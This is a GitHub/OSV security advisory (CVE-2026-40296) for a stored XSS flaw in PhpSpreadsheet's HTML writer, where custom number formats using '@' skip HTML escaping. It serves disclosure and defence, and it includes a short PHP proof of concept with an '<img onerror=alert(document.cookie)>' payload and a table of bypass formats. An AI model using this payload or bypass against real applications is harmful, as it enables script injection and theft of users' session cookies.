GHSA-hrmw-qprp-wgmc

Suggest an improvement
Source
https://github.com/advisories/GHSA-hrmw-qprp-wgmc
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-hrmw-qprp-wgmc
Aliases
  • CVE-2026-40296
Published
2026-04-28T22:57:13Z
Modified
2026-05-08T19:50:57.048795Z
Severity
  • 5.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
PhpSpreadsheet has XSS via number format code with @ text placeholder bypasses htmlspecialchars in HTML writer
Details

It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes.

The Problem

In Writer/Html.php around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply htmlspecialchars():

if ($cellData === $origData) {
    $cellData = htmlspecialchars($cellData, ...);
}

When a cell has a custom number format containing @ (text placeholder) with any additional literal characters, the formatter replaces @ with the cell value and adds the extra characters. This makes $cellData !== $origData, so htmlspecialchars() is skipped entirely.

Even a single trailing space in the format (@) is enough to bypass the escape.

Proof of Concept

use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
use PhpOffice\PhpSpreadsheet\Cell\DataType;

$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();

// XSS payload with malicious number format
$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');

$writer = new Html($spreadsheet);
$writer->save('output.html');

The generated HTML contains:

<td>. <img src=x onerror=alert(document.cookie)></td>

The XSS payload is completely unescaped.

Tested Bypass Formats

| Format Code | Result | Escaped? | |---|---|---| | General (default) | Original value | YES (safe) | | . @ | . + value | NO (XSS!) | | @ (trailing space) | value + | NO (XSS!) | | x@ | x + value | NO (XSS!) |

This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.

Impact

Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users

...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's xl/styles.xml.

Suggested Fix

Always apply htmlspecialchars() regardless of whether formatting changed the value:

// Instead of conditional escaping:
$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

Or escape AFTER formatting, not conditionally based on equality.

Reporter

Keyvan Hardani

Database specific 
{
    "cwe_ids": [
        "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-28T22:57:13Z",
    "nvd_published_at": "2026-05-06T22:16:25Z",
    "severity": "MODERATE"
}
References

Affected packages

Packagist
phpoffice/phpspreadsheet

Package

Name
phpoffice/phpspreadsheet
Purl
pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
4.0.0
Fixed
5.7.0

Affected versions

4.*
4.0.0
4.1.0
4.2.0
4.3.0
4.3.1
4.4.0
4.5.0
5.*
5.0.0
5.1.0
5.2.0
5.3.0
5.4.0
5.5.0
5.6.0

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json"
last_known_affected_version_range 
"<= 5.6.0"
phpoffice/phpspreadsheet

Package

Name
phpoffice/phpspreadsheet
Purl
pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.3.0
Fixed
3.10.5

Affected versions

3.*
3.3.0
3.4.0
3.5.0
3.6.0
3.7.0
3.8.0
3.9.0
3.9.1
3.9.2
3.9.3
3.10.0
3.10.1
3.10.2
3.10.3
3.10.4

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json"
last_known_affected_version_range 
"<= 3.10.4"
phpoffice/phpspreadsheet

Package

Name
phpoffice/phpspreadsheet
Purl
pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.2.0
Fixed
2.4.5

Affected versions

2.*
2.2.0
2.2.1
2.2.2
2.3.0
2.3.2
2.3.3
2.3.4
2.3.5
2.3.6
2.3.7
2.3.8
2.3.9
2.3.10
2.4.0
2.4.1
2.4.2
2.4.3
2.4.4

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json"
last_known_affected_version_range 
"<= 2.4.4"
phpoffice/phpspreadsheet

Package

Name
phpoffice/phpspreadsheet
Purl
pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.0.0
Fixed
2.1.16

Affected versions

2.*
2.0.0
2.1.0
2.1.1
2.1.3
2.1.4
2.1.5
2.1.6
2.1.7
2.1.8
2.1.9
2.1.10
2.1.11
2.1.12
2.1.13
2.1.14
2.1.15

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json"
last_known_affected_version_range 
"<= 2.1.15"
phpoffice/phpspreadsheet

Package

Name
phpoffice/phpspreadsheet
Purl
pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.30.4

Affected versions

1.*
1.0.0-beta
1.0.0-beta2
1.0.0
1.1.0
1.2.0
1.2.1
1.3.0
1.3.1
1.4.0
1.4.1
1.5.0
1.5.1
1.5.2
1.6.0
1.7.0
1.8.0
1.8.1
1.8.2
1.9.0
1.10.0
1.10.1
1.11.0
1.12.0
1.13.0
1.14.0
1.14.1
1.15.0
1.16.0
1.17.0
1.17.1
1.18.0
1.19.0
1.20.0
1.21.0
1.22.0
1.23.0
1.24.0
1.24.1
1.25.0
1.25.1
1.25.2
1.26.0
1.27.0
1.27.1
1.28.0
1.29.0
1.29.1
1.29.2
1.29.4
1.29.5
1.29.6
1.29.7
1.29.8
1.29.9
1.29.10
1.29.11
1.29.12
1.30.0
1.30.1
1.30.2
1.30.3

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-hrmw-qprp-wgmc/GHSA-hrmw-qprp-wgmc.json"
last_known_affected_version_range 
"<= 1.30.3"